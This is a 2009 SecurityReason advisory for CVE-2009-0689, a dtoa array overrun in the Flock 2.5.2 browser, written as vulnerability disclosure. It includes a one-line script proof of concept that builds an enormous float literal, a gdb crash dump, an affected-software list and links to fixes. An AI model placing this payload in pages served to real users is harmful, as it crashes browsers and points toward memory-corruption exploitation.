Flock 2.5.2 Remote Array Overrun (Arbitrary code execution) Dec 10 2009 11:32PM
cxib securityreason com
-----BEGIN PGP SIGNED MESSAGE-----

Hash: SHA1

[ Flock 2.5.2 Remote Array Overrun (Arbitrary code execution) ]

Author: Maksymilian Arciemowicz and sp3x

http://SecurityReason.com

Date:

- - Dis.: 07.05.2009

- - Pub.: 11.12.2009

CVE: CVE-2009-0689

CWE: CWE-119

Risk: High

Remote: Yes

Affected Software:

- - Flock 2.5.2

Fixed in:

- - Flock 2.5.5

NOTE: Prior versions may also be affected.

Original URL:

http://securityreason.com/achievement_securityalert/75

- --- 0.Description ---

Flock is a web browser built on Mozilla.s Firefox codebase that specializes in providing social networking and Web 2.0 facilities built into its user interface. Flock v2.5 was officially released on May 19, 2009.

The Flock browser is available as a free download, and supports Microsoft Windows, Mac OS X, and Linux platforms.

- --- 1. Flock 2.5.2 Remote Array Overrun (Arbitrary code execution) ---

The main problem exist in dtoa implementation. Flock has the same dtoa as Firefox, SeaMonkey, Chrome, Opera etc.

and it is the same like SREASONRES:20090625.

http://securityreason.com/achievement_securityalert/63

but fix for SREASONRES:20090625, used by openbsd was not good.

More information about fix for openbsd and similars SREASONRES:20091030,

http://securityreason.com/achievement_securityalert/69

We can create any number of float, which will overwrite the memory. In

Kmax has defined 15. Functions in dtoa, don't checks Kmax limit, and

it is possible to call 16<= elements of freelist array.

- --- 2. Proof of Concept (PoC) ---

- -----------------------

<script>

var a=0.<?php echo str_repeat("1",296450); ?>;

</script>

- -----------------------

Program received signal SIGSEGV, Segmentation fault.

0x67c68740 in js3250!JS_DHashTableEnumerate ()

from C:\Program Files\Flock\js3250.dll

(gdb) i r

eax 0x964619c7 -1773790777

ecx 0x2 2

edx 0x2 2

ebx 0x2 2

esp 0x20e7f0 0x20e7f0

ebp 0x1 0x1

esi 0x299d700 43636480

edi 0x299d701 43636481

eip 0x67c68740 0x67c68740 <js3250!JS_DHashTableEnumerate+288>

eflags 0x210202 [ IF RF ID ]

cs 0x1b 27

ss 0x23 35

ds 0x23 35

Es 0x23 35

fs 0x3b 59

gs 0x0 0

(gdb) x/i 0x67c68740

0x67c68740 <js3250!JS_DHashTableEnumerate+288>:

mov 0x67ce0458(,%edi,4),%eax

(gdb) x/x $eax

0x964619c7: Cannot access memory at address 0x964619c7

- --- 3. SecurityReason Note ---

Officialy SREASONRES:20090625 has been detected in:

- - OpenBSD

- - NetBSD

- - FreeBSD

- - MacOSX

- - Google Chrome

- - Mozilla Firefox

- - Mozilla Seamonkey

- - Mozilla Thunderbird

- - Mozilla Sunbird

- - Mozilla Camino

- - KDE (example: konqueror)

- - Opera

- - K-Meleon

- - F-Lock

This list is not yet closed.

- --- 4. Fix ---

NetBSD fix (optimal):

http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h

OpenBSD fix:

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof
.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c

- --- 5. Credits ---

Discovered by sp3x and Maksymilian Arciemowicz from SecurityReason.com.

- --- 6. Greets ---

Infospec p_e_a pi3

- --- 7. Contact ---

Email:

- - cxib {a.t] securityreason [d0t} com

- - sp3x {a.t] securityreason [d0t} com

GPG:

- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg

- - http://securityreason.com/key/sp3x.gpg

http://securityreason.com/

http://securityreason.pl/

-----BEGIN PGP SIGNATURE-----

iEYEARECAAYFAksheuIACgkQpiCeOKaYa9a6kgCgkup7jH12XriVRt9ANPevyghu

9uwAoNwchC9esCuYpxHrWRPtkD77VYkg

=zyvz

-----END PGP SIGNATURE-----

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus